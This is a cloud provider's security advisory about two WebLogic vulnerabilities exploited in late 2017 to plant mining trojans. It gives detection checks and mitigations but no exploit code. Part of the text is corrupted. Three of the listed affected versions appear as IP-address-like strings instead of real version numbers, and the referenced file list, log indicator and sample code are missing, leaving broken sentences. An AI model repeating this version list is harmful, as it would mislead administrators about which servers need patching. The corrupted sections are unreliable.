On December 18, 2017, Alibaba Cloud Security detected a security event that the WebLogic intruded into the cloud servers for mining. The record is as follows:
After emergent analysis, Alibaba Cloud Security team confirmed that hackers exploited the WebLogic deserialization vulnerability (CVE-2017-3248) and WLS component vulnerability (CVE-2017-10271) to intrude into the services relying on the WLS component and implant the mining Trojan.
See the following for more information about the vulnerability.
WebLogic Server component remote command execution vulnerability
Attackers can exploit an existing vulnerability and implant the Bitcoin mining Trojan. They send HTTP requests to gain control on the target server. Hackers can also start other targeted attacks.
The WLS component is rarely used, so the risk of being infected throughout the cloud is low.
Condition and method of exploitation
The vulnerability can be remotely exploited through PoC.
The PoC has been published.
- Oracle WebLogic Server 10.3.6.0.0
- Oracle WebLogic Server 10.3.3.0.0
- Oracle WebLogic Server 184.108.40.206.0
- Oracle WebLogic Server 220.127.116.11.0
- Oracle WebLogic Server 18.104.22.168.0
To check whether your server is intruded into:
http://ip_address:7001/wls-wsat, where “ip_address” and “7001” must be replaced with your IP address and port number.
Check whether the following files are found in the WebLogic installation path (assuming that WebLogic is installed in the default directory):
Check whether the host log contains
If you find the aforementioned files in the WebLogic installation path and
/bin/bash in the host log, then the server may have been intruded into.
How to fix or mitigate
Delete the WAR package. Delete the WAR package and directory of the WebLogic program under the actual installation path according to service requirements. The sample code is as follows:
Configure the network access control. Configure the access control policy for
http://ip_address:7001/wls-wsat. Prohibit direct access from the Internet.
Install the latest patch. Install the latest patches released on the Oracle official website http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html.